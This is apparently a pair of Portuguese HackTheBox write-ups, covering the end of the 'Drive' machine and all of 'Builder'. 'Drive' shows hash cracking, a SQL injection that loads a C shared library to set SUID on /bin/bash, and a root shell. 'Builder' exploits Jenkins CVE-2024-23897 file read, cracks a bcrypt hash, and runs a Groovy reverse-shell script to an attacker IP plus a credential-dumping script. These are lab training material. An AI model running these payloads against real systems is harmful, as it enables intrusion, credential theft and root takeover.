martin:x:1001:1001:martin cruz,,,:/home/martin:/bin/bash
cris:x:1002:1002:Cris Disel,,,:/home/cris:/bin/bash
tom:x:1003:1003:Tom Hands,,,:/home/tom:/bin/bash

Visto que o usuário martin nós ja temos a senha e o usuário root não esta presente.

Tivemos sucesso realizando o procedimento para o usuário tom:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/drive]
└─# hashcat -m 124 hashes/tom-sha1 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344389
* Bytes.....: 139921546
* Keyspace..: 14344389

sha1$Ri2bP6RVoZD5XYGzeYWr7c$71eb1093e10d8f7f4d1eb64fa604e6050f8ad141:johniscool
sha1$DhWa3Bym5bj9Ig73wYZRls$3ecc0c96b090dea7dfa0684b9a1521349170fc93:john boy
sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db88969525a:johnmayer7

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 124 (Django (SHA-1))
Hash.Target......: hashes/tom-sha1

Com a senha johnmayer7 tivemos sucesso para acessar o host alvo via ssh e assim conseguir a user flag:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/drive/DoodleGrive]
└─# ssh tom@drive.htb
tom@drive.htb's password: 
Permission denied, please try again.
tom@drive.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-164-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Sun 15 Oct 2023 05:37:12 PM UTC
  System load:           0.02
  Usage of /:            63.3% of 5.07GB
  Memory usage:          27%
  Swap usage:            0%
  Processes:             230
  Users logged in:       1
  IPv4 address for eth0: 10.129.81.217
  IPv6 address for eth0: dead:beef::250:56ff:fe96:c5d5
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Oct  9 09:19:30 2023 from 10.10.14.40
tom@drive:~$ ls -alh
total 916K
drwxr-x--- 6 tom  tom  4.0K Sep 13 13:51 .
drwxr-xr-x 6 root root 4.0K Dec 25  2022 ..
lrwxrwxrwx 1 root root    9 Sep  6 02:56 .bash_history -> /dev/null
-rw-r--r-- 1 tom  tom   220 Dec 25  2022 .bash_logout
-rw-r--r-- 1 tom  tom  3.7K Dec 25  2022 .bashrc
drwx------ 3 tom  tom  4.0K Jan  1  2023 .cache
drwx------ 3 tom  tom  4.0K Feb  3  2023 .config
-rwSr-x--- 1 root tom  867K Sep 13 13:36 doodleGrive-cli
drwx------ 3 tom  tom  4.0K Jan  1  2023 .gnupg
drwxrwxr-x 3 tom  tom  4.0K Dec 28  2022 .local
-rw-r--r-- 1 tom  tom   807 Dec 25  2022 .profile
-rw-r----- 1 root tom   719 Feb 11  2023 README.txt
-rw-r----- 1 root tom    33 Oct 14 19:03 user.txt
-rw-r--r-- 1 tom  tom    39 Aug 29 05:59 .vimrc

tom@drive:~$ cat user.txt 
44c8199e75664228f6255983b324aa91

Escalação de privilégios e root flag

Agora com acesso com o usuário tom podemos visualizar que existe um binário em seu diretório home e um README.txt:

tom@drive:~$ ls -alh
total 916K
drwxr-x--- 6 tom  tom  4.0K Sep 13 13:51 .
drwxr-xr-x 6 root root 4.0K Dec 25  2022 ..
lrwxrwxrwx 1 root root    9 Sep  6 02:56 .bash_history -> /dev/null
-rw-r--r-- 1 tom  tom   220 Dec 25  2022 .bash_logout
-rw-r--r-- 1 tom  tom  3.7K Dec 25  2022 .bashrc
drwx------ 3 tom  tom  4.0K Jan  1  2023 .cache
drwx------ 3 tom  tom  4.0K Feb  3  2023 .config
-rwSr-x--- 1 root tom  867K Sep 13 13:36 doodleGrive-cli
drwx------ 3 tom  tom  4.0K Jan  1  2023 .gnupg
drwxrwxr-x 3 tom  tom  4.0K Dec 28  2022 .local
-rw-r--r-- 1 tom  tom   807 Dec 25  2022 .profile
-rw-r----- 1 root tom   719 Feb 11  2023 README.txt
-rw-r----- 1 root tom    33 Dec 27 13:59 user.txt
-rw-r--r-- 1 tom  tom    39 Aug 29 05:59 .vimrc

E podemos visualizar o conteúdo do README.txt:

tom@drive:~$ cat README.txt 
Hi team
after the great success of DoodleGrive, we are planning now to start working on our new project: "DoodleGrive self hosted",it will allow our customers to deploy their own documents sharing platform privately on thier servers...
However in addition with the "new self Hosted release" there should be a tool(doodleGrive-cli) to help the IT team in monitoring server status and fix errors that may happen.
As we mentioned in the last meeting the tool still in the development phase and we should test it properly...
We sent the username and the password in the email for every user to help us in testing the tool and make it better.
If you face any problem, please report it to the development team.
Best regards.

A mensagem informa que o binário doodleGrive-cli esta sendo desenvolvido para que clientes consigam utilizar a aplicação de modo self hosted, ou seja, sem depender da infraestrutura de terceiros.

É interessante notar que o binário possui o SUID setado, ou seja, usuários que executem este binário herdam as permissões do dono, nesse caso o usuário root.

Podemos analisar o binário usando o comando strings:

tom@drive:~$ strings doodleGrive-cli > output-strings

E agora podemos usar o vim para visualizar seu conteúdo. Dentre eles temos o seguinte conteúdo:

...
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,last_login,is_superuser,username,email,is_staff,is_active,date_joined FROM accounts_customuser;'
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,name FROM accounts_g;'
/usr/bin/sudo -u www-data /opt/server-health-check.sh
Enter username to activate account:
Error: Username cannot be empty.
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'UPDATE accounts_customuser SET is_active=1 WHERE username="%s";'
Activating account for user '%s'...
/usr/bin/sudo -u www-data /usr/bin/tail -1000 /var/log/nginx/access.log
doodleGrive cli beta-2.2:
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option:
exiting...
please Select a valid option...
PATH
[!]Caution this tool still in the development phase...please report any issue to the development team[!]
Enter Username:
Enter password for
moriarty
findMeIfY0uC@nMr.Holmz!
Welcome...!
Invalid username or password.
...

Aqui temos algumas informações importantes, primeiro o usuário e senha de acesso a aplicação.
Também temos algumas execuções do sqlite3 no qual é realizado dois selects, um para buscar do accounts_customeuser que é a tabela que buscamos os hashes do usuários. O outro select busca id e name da tabela accounts_g, que aparentemente são os grupos.
Temos outra execução que ativa um usuário, ou seja, ele realiza um update no banco setando o parâmetro is_active=1.

Analisando as opções que temos a única que aceita input do usuário é a quinta, no qual precisa informar qual conta de usuário será ativado.
Em uma busca por injeções maliciosas encontramos a possibilidade de um SQL Injection realizando o load de uma lib maliciosa.

Iremos iniciar nossa exploração criando um exploit em C com o seguinte conteúdo:

//gcc -shared name.c -o name.so -nostartfiles -fPIC

#include <sqlite3ext.h>
#include <stdlib.h>
#include <unistd.h>

SQLITE_EXTENSION_INIT1

int sqlite3_extension_init(sqlite3 *db) {
    setuid(0);
    setgid(0);
    system("/usr/bin/chmod u+s /bin/bash");
    return SQLITE_OK;
}

Este exploit vai executar um comando no sistema para adicionar o SUID no arquivo /bin/bash, para que o usuário que executar crie um shell com permissões de root. O resto da função foi tirado da documentação de Programming Loadable Extension do sqlite.

Agora precisamos compilar o arquivo para que o mesmo esteja disponível como .so, que é um arquivo de lib no linux.

Para isso vamos executar o seguinte comando:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/drive]
└─# gcc -shared exploit.c -o P.so -nostartfiles -fPIC

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/drive]
└─# ls -a  
.  ..  backups  exploit.c   P.so

A escolha do nome P.so é visando facilitar o comando para realizar o load da extensão. Ocorre que vamos precisar passar o comando como Char:

load_extension(char(65,47,80))

Isso ocorre pois tentamos anteriormente carregar utilizando path do arquivo completo, sem sucesso:

doodleGrive cli beta-2.2: 
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option: 5
Enter username to activate account: "+load_extension('/home/tom/P.so')--;      
Activating account for user '"+load_extension(hometomP.so)--'...
Error: no such column: hometomP.so

Existe uma sanitização que remove as barras, não conseguindo carregar o arquivo corretamente.

E caso passar somente o nome do arquivo, por estar no mesmo diretório da execução ele não reconhece o mesmo como um arquivo:

doodleGrive cli beta-2.2: 
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option: 5
Enter username to activate account: "+load_extension('P.so')--;
Activating account for user '"+load_extension(P.so)--'...
Error: no such column: P.so

Então a saída foi utilizar como char:

doodleGrive cli beta-2.2: 
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option: 5
Enter username to activate account: "+load_extension(char(46,47,80))--;
Activating account for user '"+load_extension(char(46,47,80))--'...

doodleGrive cli beta-2.2: 
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option: ^C
tom@drive:~$ stat /bin/bash
  File: /bin/bash
  Size: 1183448         Blocks: 2312       IO Block: 4096   regular file
Device: fd00h/64768d    Inode: 520         Links: 1
Access: (4755/-rwsr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2023-12-27 13:57:57.651723070 +0000
Modify: 2022-04-18 09:14:46.000000000 +0000
Change: 2023-12-28 01:30:08.266636758 +0000
 Birth: -

E assim conseguimos executar nosso exploit, adicionando o SUID no /bin/bash. Conseguindo acesso como root!

tom@drive:~$ /bin/bash -p
bash-5.0# id
uid=1003(tom) gid=1003(tom) euid=0(root) groups=1003(tom)

Agora que somos root na máquina, basta buscar a root flag:

bash-5.0# cd /root
bash-5.0# ls -a
.  ..  .bash_history  .bashrc  .cache  .config  .local  .mysql_history  .profile  .python_history  root.txt  .ssh  .vimrc
bash-5.0# cat root.txt
e1fe98edf410d6e5c123d829922190b8

Finalizamos assim a máquina Drive :)

HackTheBox - Writeup Builder [Retired]

Guilherme Martins — Wed, 21 Feb 2024 22:07:40 +0000

Hackthebox

Neste writeup iremos explorar uma máquina linux de nível medium que aborda as seguintes vulnerabilidades e técnicas de exploração

CVE-2024-23897 (Jenkins Arbitrary File Read)
Sensitive Data Exposure

Recon e user flag

Iremos iniciar realizando uma varredura utilizando o nmap para visualizar as portas abertas em nosso alvo:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# nmap -sV --open -Pn 10.129.220.88
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-13 12:15 EST
Nmap scan report for 10.129.220.88
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Jetty 10.0.18
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Podemos ver que existem duas portas abertas em nosso alvo, a porta 22 do ssh e a porta 8080 que roda um Jetty na versão 10.0.18. O Jetty é um servidor web feito em java.

Ao acessar a porta 8080 pelo navegador temos a seguinte página:

Se trata de um Jenkins na versão 2.441. O jenkins é uma aplicação feita em java com foco em automação focada no desenvolvimento de software, realiza ações como build, test e deploy de aplicações.

Podemos notar que ser precisar de um usuário conseguimos acesso a algumas funcionalidades do jenkins, como visualizar histórico de builds, lista os nodes (que possui somente 1 node built in que é nosso alvo).
Também podemos listar os usuários, que no caso temos somente o usuário jennifer:

Também conseguimos listar as credenciais:

Conseguimos visualizar este conteúdo pelo acesso anônimo estar habilitado.
Outro ponto importante é que notamos que a REST API do jenkins esta habilitada também:

Todos estes pontos combinam com uma vulnerabilidade recente do Jenkins, a CVE-2024-23897 que se trata de um Arbitrary File Read na versão 2.441 e anteriores.

Esta vulnerabilidade ocorre devido a uma má sanitização de um input via CLI, que é utilizado através da REST API do jenkins. Uma lib chamada args4j é utilizada para parsear argumentos via CLI. Existe uma feature que substitui o caracter @ seguido pelo path de um arquivo por um argumento com o conteúdo desse arquivo, o que nos permite ler arquivos no servidor.

No jenkins em nosso alvo conseguimos baixar o .jar que permitirá a comunicação com o jenkins.
Vamos realizar o download da seguinte forma:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# wget http://10.129.220.88:8080/jnlpJars/jenkins-cli.jar
--2024-02-13 12:20:57--  http://10.129.220.88:8080/jnlpJars/jenkins-cli.jar
Connecting to 10.129.220.88:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3623400 (3.5M) [application/java-archive]
Saving to: ‘jenkins-cli.jar’

jenkins-cli.jar                          100%[=================================================================================>]   3.46M   547KB/s    in 8.6s    

2024-02-13 12:21:06 (413 KB/s) - ‘jenkins-cli.jar’ saved [3623400/3623400]

Para explorar a vulnerabilidade executamos o seguinte comando:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# java -jar jenkins-cli.jar -s http://10.129.220.88:8080/ -http connect-node "@/etc/passwd" | cut -d '\No' -f1
cut: the delimiter must be a single character
Try 'cut --help' for more information.
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin: No such agent "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" exists.
root:x:0:0:root:/root:/bin/bash: No such agent "root:x:0:0:root:/root:/bin/bash" exists.
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin: No such agent "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" exists.
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin: No such agent "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" exists.
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin: No such agent "_apt:x:42:65534::/nonexistent:/usr/sbin/nologin" exists.
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin: No such agent "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin" exists.
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin: No such agent "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" exists.
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin: No such agent "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" exists.
bin:x:2:2:bin:/bin:/usr/sbin/nologin: No such agent "bin:x:2:2:bin:/bin:/usr/sbin/nologin" exists.
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin: No such agent "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" exists.
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin: No such agent "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" exists.
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin: No such agent "irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin" exists.
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin: No such agent "list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin" exists.
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash: No such agent "jenkins:x:1000:1000::/var/jenkins_home:/bin/bash" exists.
games:x:5:60:games:/usr/games:/usr/sbin/nologin: No such agent "games:x:5:60:games:/usr/games:/usr/sbin/nologin" exists.
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin: No such agent "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" exists.
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: No such agent "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" exists.
sys:x:3:3:sys:/dev:/usr/sbin/nologin: No such agent "sys:x:3:3:sys:/dev:/usr/sbin/nologin" exists.
sync:x:4:65534:sync:/bin:/bin/sync: No such agent "sync:x:4:65534:sync:/bin:/bin/sync" exists.

ERROR: Error occurred while performing this command, see previous stderr output.

Conseguimos o retorno do /etc/passwd, podemos colocar o resultado em um arquivo para filtrar a saída:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# awk -F 'No such agent' '{print $1}' passwd                      
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin: 
root:x:0:0:root:/root:/bin/bash: 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin: 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin: 
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin: 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin: 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin: 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin: 
bin:x:2:2:bin:/bin:/usr/sbin/nologin: 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin: 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin: 
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin: 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin: 
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash: 
games:x:5:60:games:/usr/games:/usr/sbin/nologin: 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin: 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: 
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

Podemos notar que existem dois usuários, root e jenkins. A home do root é** /root e a home do usuário jenkins é /var/jenkins_home.

Com isso conseguimos buscar a user flag:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# java -jar jenkins-cli.jar -s http://10.129.220.88:8080/ -http connect-node "@/var/jenkins_home/user.txt"          

ERROR: No such agent "aea470ff3badab8504db49aa7e1d9e34" exists.

Escalação de privilégios e root flag

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# java -jar jenkins-cli.jar -s http://10.129.220.88:8080/ -http connect-node "@/var/jenkins_home/users/users.xml"

<?xml version='1.1' encoding='UTF-8'?>: No such agent "<?xml version='1.1' encoding='UTF-8'?>" exists.
      <string>jennifer_12108429903186576833</string>: No such agent "      <string>jennifer_12108429903186576833</string>" exists.
  <idToDirectoryNameMap class="concurrent-hash-map">: No such agent "  <idToDirectoryNameMap class="concurrent-hash-map">" exists.
    <entry>: No such agent "    <entry>" exists.
      <string>jennifer</string>: No such agent "      <string>jennifer</string>" exists.
  <version>1</version>: No such agent "  <version>1</version>" exists.
</hudson.model.UserIdMapper>: No such agent "</hudson.model.UserIdMapper>" exists.
  </idToDirectoryNameMap>: No such agent "  </idToDirectoryNameMap>" exists.
<hudson.model.UserIdMapper>: No such agent "<hudson.model.UserIdMapper>" exists.
    </entry>: No such agent "    </entry>" exists.

ERROR: Error occurred while performing this command, see previous stderr output.

Iremos adicionar o resultado em um arquivo para uma melhor leitura:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# awk -F 'No such agent' '{print $1}' users.xml 
<?xml version='1.1' encoding='UTF-8'?>: 
      <string>jennifer_12108429903186576833</string>: 
  <idToDirectoryNameMap class="concurrent-hash-map">: 
    <entry>: 
      <string>jennifer</string>: 
  <version>1</version>: 
</hudson.model.UserIdMapper>: 
  </idToDirectoryNameMap>: 
<hudson.model.UserIdMapper>: 
    </entry>:

Essa informação é importante porque aqui descobrimos o diretório com as informações do usuário jennifer, que o jenkins cria com um número randomico: jennifer_12108429903186576833

Descobrimos assim a conteúdo do arquivo que contém as informações do usuário:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# java -jar jenkins-cli.jar -s http://10.129.220.88:8080/ /var/jenkins_home/users/jennifer_12108429903186576833/config.xml
...
...

Conseguimos visualizar melhor filtrando em um arquivo:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# awk -F 'No such agent' '{print $1}' jennifer-config.xml 
<hudson.tasks.Mailer_-UserProperty plugin="mailer@463.vedf8358e006b_">: 
    <hudson.search.UserSearchProperty>: 
      <roles>: 
    <jenkins.security.seed.UserSeedProperty>: 
      </tokenStore>: 
    </hudson.search.UserSearchProperty>: 
      <timeZoneName></timeZoneName>: 
  <properties>: 
    <jenkins.security.LastGrantedAuthoritiesProperty>: 
      <flags/>: 
    <hudson.model.MyViewsProperty>: 
</user>: 
    </jenkins.security.ApiTokenProperty>: 
      <views>: 
        <string>authenticated</string>: 
    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.200.vb_9327d658781">: 
<user>: 
          <name>all</name>: 
  <description></description>: 
      <emailAddress>jennifer@builder.htb</emailAddress>: 
      <collapsed/>: 
    </jenkins.security.seed.UserSeedProperty>: 
    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>: 
    </hudson.model.MyViewsProperty>: 
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>: 
          <filterQueue>false</filterQueue>: 
    <jenkins.security.ApiTokenProperty>: 
      <primaryViewName></primaryViewName>: 
      </views>: 
    </hudson.model.TimeZoneProperty>: 
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@1319.v7eb_51b_3a_c97b_">: 
    </hudson.model.PaneStatusProperties>: 
    </hudson.tasks.Mailer_-UserProperty>: 
        <tokenList/>: 
    <jenkins.console.ConsoleUrlProviderUserProperty/>: 
        </hudson.model.AllView>: 
      <timestamp>1707318554385</timestamp>: 
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>: 
  </properties>: 
    </jenkins.model.experimentalflags.UserExperimentalFlagsProperty>: 
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>: 
    <hudson.security.HudsonPrivateSecurityRealm_-Details>: 
      <insensitiveSearch>true</insensitiveSearch>: 
          <properties class="hudson.model.View$PropertyList"/>: 
    <hudson.model.TimeZoneProperty>: 
        <hudson.model.AllView>: 
    </hudson.security.HudsonPrivateSecurityRealm_-Details>: 
      <providerId>default</providerId>: 
      </roles>: 
    </jenkins.security.LastGrantedAuthoritiesProperty>: 
    <jenkins.model.experimentalflags.UserExperimentalFlagsProperty>: 
    <hudson.model.PaneStatusProperties>: 
<?xml version='1.1' encoding='UTF-8'?>: 
  <fullName>jennifer</fullName>: 
      <seed>6841d11dc1de101d</seed>: 
  <id>jennifer</id>: 
  <version>10</version>: 
      <tokenStore>: 
          <filterExecutors>false</filterExecutors>: 
    <io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>: 
      <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>:

E assim conseguimos o email jennifer@builder.htb e a hash da senha do usuário $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a

Vamos utilizar o john the ripper para quebrar essa hash:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# john -w=/usr/share/wordlists/rockyou.txt jennifer-hash                                                                   
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
princess         (?)     
1g 0:00:00:00 DONE (2024-02-14 17:12) 3.030g/s 109.0p/s 109.0c/s 109.0C/s 123456..liverpool
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Conseguimos a senha do usuário jennifer, agora podemos logar na interface do jenkins:

O jenkins permite que seja executado scripts groovy através da sua interface pelo script console:

Aqui podemos executar comandos no node do jenkins, que em nosso caso é nosso alvo. Podemos inclusive pegar um shell com o seguinte script:

String host='10.10.16.25'; int port=4444; String cmd='bash'; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
import com.cloudbees.plugins.credentials.*
import com.cloudbees.plugins.credentials.impl.*
import com.cloudbees.plugins.credentials.domains.*
import com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey
import org.jenkinsci.plugins.plaincredentials.StringCredentials
import org.jenkinsci.plugins.plaincredentials.impl.FileCredentialsImpl

def showRow = { credentialType, secretId, username = null, password = null, description = null ->
println("${credentialType} : ".padLeft(20) + secretId?.padRight(38)+" | " +username?.padRight(20)+" | " +password?.padRight(40) + " | " +description)
}

// set Credentials domain name (null means is it global)
domainName = null

credentialsStore = Jenkins.instance.getExtensionList('com.cloudbees.plugins.credentials.SystemCredentialsProvider')[0]?.getStore()
domain = new Domain(domainName, null, Collections.<DomainSpecification>emptyList())

credentialsStore?.getCredentials(domain).each{
if(it instanceof UsernamePasswordCredentialsImpl)
showRow("user/password", it.id, it.username, it.password?.getPlainText(), it.description)
else if(it instanceof BasicSSHUserPrivateKey)
showRow("ssh priv key", it.id, it.passphrase?.getPlainText(), it.privateKeySource?.getPrivateKey()?.getPlainText(), it.description)
else if(it instanceof StringCredentials)
showRow("secret text", it.id, it.secret?.getPlainText(), '', it.description)
else if(it instanceof FileCredentialsImpl)
showRow("secret file", it.id, it.content?.text, '', it.description)
else
showRow("something else", it.id, '', '', '')
}

return

E assim temos uma chave privada:

Vamos salvar o conteúdo em um arquivo chamado id_rsa_root e alterar sua permissão para 600, pois chaves privadas precisam ter uma permissão mais restritiva para que serem utilizadas:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# chmod 600 id_rsa_root

Testando a chave privada como usuário root em nosso alvo conseguimos o acesso:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/builder]
└─# ssh -i id_rsa_root root@10.129.244.76
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Wed Feb 14 10:50:05 PM UTC 2024

  System load:              0.2177734375
  Usage of /:               66.0% of 5.81GB
  Memory usage:             33%
  Swap usage:               0%
  Processes:                247
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for eth0:    10.129.244.76
  IPv6 address for eth0:    dead:beef::250:56ff:fe96:9588


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


Last login: Mon Feb 12 13:15:44 2024 from 10.10.14.40

E assim conseguimos a root flag:

root@builder:~# ls -alh
total 32K
drwx------  5 root root 4.0K Feb 14 22:47 .
drwxr-xr-x 18 root root 4.0K Feb  9 15:45 ..
lrwxrwxrwx  1 root root    9 Apr 27  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Oct 15  2021 .bashrc
drwx------  2 root root 4.0K Apr 27  2023 .cache
drwxr-xr-x  3 root root 4.0K Apr 27  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r-----  1 root root   33 Feb 14 22:47 root.txt
drwx------  2 root root 4.0K Feb  8 11:24 .ssh
root@builder:~# cat root.txt 
229275386e7300b9ad9425a630fa815c

Finalizando a máquina Builder !